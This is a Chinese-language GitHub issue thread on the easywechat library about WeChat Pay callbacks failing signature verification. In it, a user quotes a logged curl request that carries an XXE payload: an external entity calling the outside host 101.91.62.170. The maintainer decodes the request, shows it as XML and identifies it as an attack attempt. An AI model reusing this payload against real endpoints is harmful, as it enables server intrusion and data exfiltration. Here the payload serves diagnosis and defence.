### ISSUE TITLE
支付回调的时候验签错误的问题

### ISSUE THREAD

**Issue by kbdxbt** [w7corp/easywechat#1676]
## 我用的环境

* PHP 版本：7.1
* overtrue/wechat 版本：4.X
* 是否使用了框架？框架名称：yii2

## 问题及现象

在处理支付回调的时候，出现回调验签错误的问题，抛出一下异常我记录了日志

文件:/www/wwwroot/paotui.hjrxkj.com/vendor/overtrue/wechat/src/Payment/Notify/Handler.php

行:186

错误:

回调XML参数：
微信支付异步通知微信请求参数xml：<xml><appid><![CDATA[wx2833ed33a40205d3]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[N]]></is_subscribe>
<mch_id><![CDATA[1523350971]]></mch_id>
<merchant_id><![CDATA[1]]></merchant_id>
<nonce_str><![CDATA[5d6d0aa393013]]></nonce_str>
<openid><![CDATA[o5YKL5di_Sb5rKRIDHkrq3W9uyQ8]]></openid>
<out_trade_no><![CDATA[156742723551561025]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[C3ECA398D2FE2C2667EE38C3C7BFBD11]]></sign>
<time_end><![CDATA[20190902202720]]></time_end>
<total_fee>1</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000393201909022900592127]]></transaction_id>
</xml>

请问是什么原因造成验签失败呢？或者需要排查哪些配置？

**Comment by xxy123456** [comment]
我也遇到了这个问题。貌似下单接口返回的签名在不能直接在小程序的直接里面直接用。https://pay.weixin.qq.com/wiki/doc/api/wxa/wxa_api.php?chapter=7_7&index=5

**Comment by mouyong** [comment]
支付回调时出现错误

![image](https://user-images.githubusercontent.com/10336437/71219502-38509a00-2300-11ea-9e82-0f13b23eae53.png)


```
curl \
 -X POST \
 -H "Accept-Encoding: identity" \
 -H "Connection: close" \
 -H "Content-Length: 237" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -H "Host: example.com" \
 -H "User-Agent: Python-urllib/2.7" \
 --data "%3C%3Fxml_version=%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3C!DOCTYPE+root+%5B%0A%3C!ENTITY+%25+xxe+SYSTEM+%22http%3A%2F%2F101.91.62.170%3A4837%2Fwx_xxe_dbc_os_2019122003_888%3FaHR0cHM6Ly9lcnAuY2JsaW5rLm5ldC9hcGkvd2VjaGF0L3BheW1lbnQvY2FsbGJhY2svd3hkZDQzYzc1ODc5MzU4MDRh%22%3E%0A%25xxe%3B%0A%5D%3E" \
 "https://xxx.com/api/wechat/payment/callback/wxdd43c7587935804a"
```

**Comment by mouyong** [comment]
> 支付回调时出现错误
> 
> ![image](https://user-images.githubusercontent.com/10336437/71219502-38509a00-2300-11ea-9e82-0f13b23eae53.png)
> 
> ```
> curl \
>  -X POST \
>  -H "Accept-Encoding: identity" \
>  -H "Connection: close" \
>  -H "Content-Length: 237" \
>  -H "Content-Type: application/x-www-form-urlencoded" \
>  -H "Host: example.com" \
>  -H "User-Agent: Python-urllib/2.7" \
>  --data "%3C%3Fxml_version=%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3C!DOCTYPE+root+%5B%0A%3C!ENTITY+%25+xxe+SYSTEM+%22http%3A%2F%2F101.91.62.170%3A4837%2Fwx_xxe_dbc_os_2019122003_888%3FaHR0cHM6Ly9lcnAuY2JsaW5rLm5ldC9hcGkvd2VjaGF0L3BheW1lbnQvY2FsbGJhY2svd3hkZDQzYzc1ODc5MzU4MDRh%22%3E%0A%25xxe%3B%0A%5D%3E" \
>  "https://xxx.com/api/wechat/payment/callback/wxdd43c7587935804a"
> ```

post 请求的数据中，无法转义字符串为 xml 数据，并且支付回调中，xxe 请求不知道是哪里来的，只是简单的抛出了错误。
https://developers.weixin.qq.com/community/pay/doc/000ea00157ce784f7b689851a51c08

**Comment by overtrue** [comment]
```
<?xml_version="1.0"+encoding="utf-8"?>
<!DOCTYPE+root+[
<!ENTITY+%+xxe+SYSTEM+"http://101.91.62.170:4837/wx_xxe_dbc_os_2019122003_888?aHR0cHM6Ly9lcnAuY2JsaW5rLm5ldC9hcGkvd2VjaGF0L3BheW1lbnQvY2FsbGJhY2svd3hkZDQzYzc1ODc5MzU4MDRh">
%xxe;
]>
```

很明显是有人要黑你。。。

**Comment by overtrue** [comment]
https://github.com/overtrue/wechat/issues/1282
https://github.com/overtrue/laravel-wechat/issues/261
https://github.com/overtrue/wechat/issues/1285
https://github.com/overtrue/wechat/issues/1286

**Comment by mouyong** [comment]
这个就狠了。不过这种就直接抛出了错误。要不要抑制一下？ @overtrue

**Comment by overtrue** [comment]
你可以在业务实现中try catch

= - = <notifications@github.com>于2019年12月24日 周二上午8:22写道：

**Comment by mouyong** [comment]
了解了

**Comment by nongzhenli** [comment]
> 我也遇到了这个问题。貌似下单接口返回的签名在不能直接在小程序的直接里面直接用。https://pay.weixin.qq.com/wiki/doc/api/wxa/wxa_api.php?chapter=7_7&index=5

你好！请问你是怎么解决的呢？我也遇到这个问题！小程序中统一下单已经成功返回数据，但是签名验证就是失败，
在小程序唤起支付的时候，我就是直接拿 `sign`字段了，苦闷几天，奈何不知道什么原因，请指教~
![image](https://user-images.githubusercontent.com/19389294/72633239-ff552500-3992-11ea-8108-1c324e783bd9.png)
